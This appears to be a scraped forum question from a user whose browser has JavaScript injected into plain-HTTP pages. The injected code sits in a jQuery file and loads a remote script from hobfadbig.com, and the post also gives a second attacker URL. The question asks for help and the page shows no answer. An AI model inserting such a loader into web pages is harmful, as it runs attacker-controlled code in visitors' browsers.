google-chrome - Clickjacked every non secure site (http) by hobfadbig.com
问题描述
My all browser click-jacked by some kind of method not sure how,
By spending huge time some how figured out who is doing this,
Domain named hobfadbig.com is injecting below script in jquery-1.4.2.min.js file in every non https site. Secure site working fine as it is, but this attack works on non secure http web sites
document.addEventListener(
'DOMContentLoaded',
function () {
var esp = document.createElement('span');
var esr = document.createElement('script');
esr.src = 'http://hobfadbig.com/ryjlRQHB8rfBdYEZN/6922?ndn=m2';
esr.type = 'text/javascript';
esp.appendChild(esr);
document.body.appendChild(esp);
},
false
);
I have tried this thing already.
- cleared cookies
- Uninstalled browser and installed it again
- Even changed operating system
- Linux, Windows both OS having same issue
Still some how attacks successful.
Update: another source this type of attack: http://tareinlettartar.com/rgGUtPyNvlNBEQld3/6932?aDcPgiD=1&aDgRpiD=93&tAgaDiD=296&nsVnM=m2
解决方案
推荐阅读
- mysql - 在 JPQL 中使用 JOIN 和 SUM 进行选择
- vb.net - 如何将天数转换为小时数?
- php - 绑定后变量不从mysqli语句输出
- python - 将数组值返回到 HTML 最终会写入产品 10 次,而不是一次
- http-headers - 如何找到特定网站的 X-RateLimit-Limit
- r - 如何将.csv的每个单元格中的值除以R中多个行和变量的另一个单元格中的值?
- c++ - 正方体总是缺少图片中的文本行
- python - AttributeError:模块“tensorflow”没有属性“compat”
- python - 将 JSON 解析为不带前缀的 Pandas
- ruby-on-rails - 葡萄添加新端点